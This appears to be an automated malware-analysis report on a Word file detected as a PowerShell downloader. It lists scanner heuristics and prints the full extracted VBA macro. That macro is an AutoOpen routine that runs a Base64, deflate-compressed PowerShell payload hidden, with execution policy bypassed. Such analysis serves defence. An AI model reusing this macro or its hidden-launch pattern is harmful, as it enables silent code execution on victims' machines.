MALICIOUS
318
Risk Score
Heuristics 10
-
ClamAV: Doc.Downloader.Pwshell-10001336-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell exec, vbHide -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
Command = windir + "\syswow64\windowspowershell\v1.0\powershell.exe" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Arch = Environ("PROCESSOR_ARCHITECTURE") -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3006 bytes |
SHA-256: dcc4bd0faccbbd2d385b67da3788a1be1aa30601b6dcacec5a8282916a3484d5 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
'VBA arch detect suggested by "T"
Dim Command As String
Dim str As String
Dim exec As String
Arch = Environ("PROCESSOR_ARCHITECTURE")
windir = Environ("windir")
If Arch = "AMD64" Then
Command = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"
Else
Command = "powershell.exe"
End If
str = "5VZRj6M2EH7Pr7AiHhItrIzBEC5a6a49VTqpqirt6u4hygMY00UlEB"
str = str + "FyzV7b/15mnDExez1V7WNfBuwZf/PNeDy2p9gDe7tc7N43zY"
str = str + "fDseuH1fJX3be6icR92TTL9Z4dz0VTK3Ya8mH86Msw6tmHdv"
str = str + "h56NnHuh/OefOuaTq1us795rNz3Q7scv2+XL9f1tt/7ef7Xu"
str = str + "eDfnoePyX5OV9xP/ts8nz9u/F9nZl7P5w+q374J74P+nDSw+"
str = str + "o1so1q+XbhdWMi35Vl8PRy1CwY1xS6f6+ruq2HumuZp1jwU3"
str = str + "7QbPmpbiOxZEE7jk7HXGmGMz+cWwWWJxYc89NpeO7PC+/y4H"
str = str + "Vv3jhJ5j6/hJzDJzKfmK+3bPfdy6B3+713gh3ll0qNGr0ZxS"
str = str + "YbBRpOIuGk0BKAwlGUAhQxKIpRSIEenCFXzjC0xikMBXjj1S"
str = str + "iKFGjlMJcQfFXRnwLQHKAiEAnMpfDHEQX+BJgoNIZlvASBQ0"
str = str + "DWYFdxoiFTl5XlHAvygWvLSQF/KSZHEqE0Js6TsZxWgHG4sY"
str = str + "42RNIYR8AqIm9xRnaRzZCx+2Y2/jbeCLxpJAl0KwDl4C0Fuw"
str = str + "q0UUFDEZMdpknOOMcO5ySx/JB44RiHyjE2drOIbCHFMcGjkA"
str = str + "UJ3F8JJhKyK234GBE6khVpETkE4hq5AD8JYSVgl2gQknbLlD"
str = str + "IoUkhTklkT9BaTNlZkguXIU2JQYpowQ+75MOcK/YJdmlt4ZQ"
str = str + "XEISraZAF+8bhgWeBZSCICSAAq5bQM2Rs8YfEkbaOwzmVE1R"
str = str + "RLUkSp421aIWc5iC17UKSRRdaUHIMnLV7oMpigEoKSsxA2dq"
str = str + "34D2uRmu1SpiL+38IkIvNvuwXu71yElMkIzxYkO4Vl+azGC1"
str = str + "LgkTSNJyMAg4KtL3Ln7P0hQv/2aGBhSnv8TAcGuwxcquS1cy"
str = str + "z0KSK8bLBdJzZebP/mZopJeyNC+2f9IrKcCrhw/CIh5bbcry"
str = str + "YxITyBfReG2OrTGd7srogdZNRWCWlNnwQGVUZMeUaOcki2mp"
str = str + "p0+RXidgPM2cfwteOylP6r2Mw22trA2KaEFTZobL7cDbCoaC"
str = str + "uE/TMPDSSUUmyFcvxibKHdaTz72FSzjEwmgcgppgkDxJdC4X"
str = str + "hDpni9FwCaC4pjYopRxtaYm0fRa5SbZj7VbkpaPGo51hpe4N"
str = str + "LxkUWkQGFeS6kDwG2/nx8NW1J4l2WJBRDfKikFdWAuV/BhXg"
str = str + "CRayeJKbJHLSY7sid+ErhvNw1e0L6huJnDUua+cxEkJDjfLq"
str = str + "quZyuvfuBbr2ZBo8fBSd3/qNtfhucgXI+zd3dr9ju8Vq/P5Z"
str = str + "15L+9X3uX+qRsHkVit77x67bNx6c6r9z4L1+wP1p2HoD03zf"
str = str + "bPhfcF37vOY39k5XsXHz7wzn0c8n4IHhutjyx41KprSwbPYc"
str = str + "7/Ag=="
exec = Command + " -NoP -NonI -W Hidden -Exec Bypass -Comm"
exec = exec + "and ""Invoke-Expression $(New-Object IO.StreamRea"
exec = exec + "der ($(New-Object IO.Compression.DeflateStream ("
exec = exec + "$(New-Object IO.MemoryStream (,$([Convert]::From"
exec = exec + "Base64String(\"" " & str & " \"" )))), [IO.Compr"
exec = exec + "ession.CompressionMode]::Decompress)), [Text.Enc"
exec = exec + "oding]::ASCII)).ReadToEnd();"""
Shell exec, vbHide
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.